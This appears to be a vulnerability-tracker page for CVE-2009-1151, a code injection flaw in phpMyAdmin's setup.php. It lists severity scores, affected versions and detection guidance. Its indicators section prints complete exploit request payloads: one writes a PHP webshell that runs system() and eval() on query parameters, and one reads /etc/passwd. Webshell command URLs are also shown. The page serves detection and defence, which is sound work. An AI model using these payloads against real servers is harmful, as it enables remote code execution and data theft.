cbcvebase.
CVE-2009-1151
published 2009-03-26

CVE-2009-1151: Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP…

PriorityP195critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
KEVITWEXPLOITInitial access
CISA Known Exploited Vulnerabilitydue 2022-04-15
Exploited in the wild
EPSS
95.44%
99.9th percentile
Static code injection vulnerability in setup.php in phpMyAdmin 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 allows remote attackers to inject arbitrary PHP code into a configuration file via the save action.

Affected

9 ranges
VendorProductVersion rangeFixed in
debiandebian_linux
debiandebian_linux
debianphpmyadmin< phpmyadmin 4:3.1.3.1-1 (bookworm)phpmyadmin 4:3.1.3.1-1 (bookworm)
phpmyadminphpmyadmin>= 0 < 4:3.1.3.1-14:3.1.3.1-1
phpmyadminphpmyadmin>= 0 < 4:3.1.3.1-14:3.1.3.1-1
phpmyadminphpmyadmin>= 0 < 4:3.1.3.1-14:3.1.3.1-1
phpmyadminphpmyadmin>= 0 < 4:3.1.3.1-14:3.1.3.1-1
phpmyadminphpmyadmin>= 2.11.0 < 2.11.9.52.11.9.5
phpmyadminphpmyadmin>= 3.0.0 < 3.1.3.13.1.3.1

Detection & IOCsextracted from sources · hover to see the quote

path/scripts/setup.php
path/config/config.inc.php
url/scripts/setup.php
commandaction=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix
commandaction=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix
commandaction=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
url/config/config.inc.php?c=id
url/config/config.inc.php?c=ls+-l+/
filenameexploitcookie.txt
  • Detect follow-on webshell access via GET requests to /config/config.inc.php with query parameters 'c' (system command) or 'p' (eval payload), indicating successful exploitation and shell access.
  • Detect the presence of /config/config.inc.php being accessible (HTTP 200) alongside a token in /scripts/setup.php — the exploit checks both conditions before proceeding.
  • The Metasploit module targets URI /phpMyAdmin/scripts/setup.php and writes payload to /phpMyAdmin/config/config.inc.php; alert on creation or modification of config/config.inc.php under the phpMyAdmin web root.
  • The exploit grabs a 32-character CSRF token from /scripts/setup.php before injecting; a sequence of GET then POST to /scripts/setup.php from the same source IP is a strong behavioral indicator.
  • ·The injected webshell payload is written to config/config.inc.php, which is not the active configuration file; the attacker must separately request that file to execute code.

CVSS provenance

nvdv3.19.8CRITICALCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvdv2.07.5HIGHAV:N/AC:L/Au:N/C:P/I:P/A:P
osv9.8CRITICAL
vulncheck9.8CRITICAL
cisa9.8CRITICAL
vendor_debian9.8CRITICAL
vendor_redhat9.8CRITICAL
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.